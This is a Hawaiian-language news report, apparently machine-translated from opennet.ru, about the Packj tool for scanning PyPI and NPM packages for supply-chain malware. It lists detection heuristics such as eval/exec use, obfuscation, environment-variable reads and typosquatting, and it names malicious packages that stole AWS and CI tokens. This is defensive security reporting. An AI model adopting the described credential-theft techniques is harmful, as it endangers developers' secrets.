ʻO nā mea hoʻomohala o ka Packj platform, nāna e nānā i ka palekana o nā hale waihona puke, ua paʻi i kahi hāmeʻa laina kauoha wehe e hiki ai iā lākou ke ʻike i nā hale pilikia i loko o nā pūʻolo e pili ana i ka hoʻokō ʻana i ka hana ʻino a i ʻole ka hele ʻana o nā nāwaliwali i hoʻohana ʻia e hana i nā hoʻouka kaua. ma nā papahana e hoʻohana ana i nā pūʻolo i nīnau ʻia ("chain supply"). Kākoʻo ʻia ka nānā ʻana i ka pūʻulu ma nā ʻōlelo Python a me JavaScript, mālama ʻia ma nā papa kuhikuhi PyPi a me NPM (hoʻolālā pū lākou e hoʻohui i ke kākoʻo no Ruby a me RubyGems i kēia mahina). Ua kākau ʻia ka code toolkit ma Python a māhele ʻia ma lalo o ka laikini AGPLv3.
I ka wā o ka nānā ʻana o 330 tausani mau pūʻolo me ka hoʻohana ʻana i nā mea hana i manaʻo ʻia ma ka waihona PyPi, ua ʻike ʻia he 42 mau pōʻai ʻino me nā puka hope a me 2.4 tausani mau pūʻulu pilikia. I ka wā o ka nānā ʻana, hana ʻia kahi loiloi code static no ka ʻike ʻana i nā hiʻohiʻona API a loiloi i ka hele ʻana o nā mea nāwaliwali i ʻike ʻia i ka waihona OSV. Hoʻohana ʻia ka pūʻolo MalOSS e nānā i ka API. Hoʻopili ʻia ke code pūʻolo no ka loaʻa ʻana o nā ʻano maʻamau i hoʻohana mau ʻia i ka polokalamu malware. Ua hoʻomākaukau ʻia nā mamana ma muli o ke aʻo ʻana o 651 mau ʻeke me ka hana ʻino i hoʻopaʻa ʻia.
Hoʻomaopopo pū ia i nā hiʻohiʻona a me nā metadata e alakaʻi i ka piʻi ʻana o ka hoʻohana hewa ʻana, e like me ka hoʻokō ʻana i nā poloka ma o "eval" a i ʻole "exec," e hana ana i nā code hou i ka wā e holo ana, me ka hoʻohana ʻana i nā ʻenehana code obfuscated, ka hoʻololi ʻana i nā ʻano hoʻololi kaiapuni, a me ke komo ʻole ʻana. nā waihona, ke kiʻi ʻana i nā kumuwaiwai pūnaewele ma nā palapala hoʻonohonoho (setup.py), me ka hoʻohana ʻana i ka typequatting (kau ʻana i nā inoa e like me nā inoa o nā hale waihona puke kaulana), ka ʻike ʻana i nā papahana kahiko a haʻalele ʻia, e wehewehe ana i nā leka uila a me nā pūnaewele ʻole, nele i kahi waihona lehulehu me ke code.
Eia hou, hiki iā mākou ke hoʻomaopopo i ka ʻike ʻia e nā mea noiʻi palekana ʻē aʻe o ʻelima mau pōʻai ʻino i loko o ka waihona PyPi, nāna i hoʻouna i nā ʻike o nā mea hoʻololi kaiapuni i kahi kikowaena waho me ka manaʻo o ka ʻaihue ʻana i nā hōʻailona no AWS a me nā ʻōnaehana hoʻohui mau: loglib-modules (i hōʻike ʻia e like me modules no ka waihona loglib pono), pyg-modules, pygrata a me pygrata-utils (i hoʻohui ʻia i ka waihona pyg pono) a me hkg-sol-utils.
Source: opennet.ru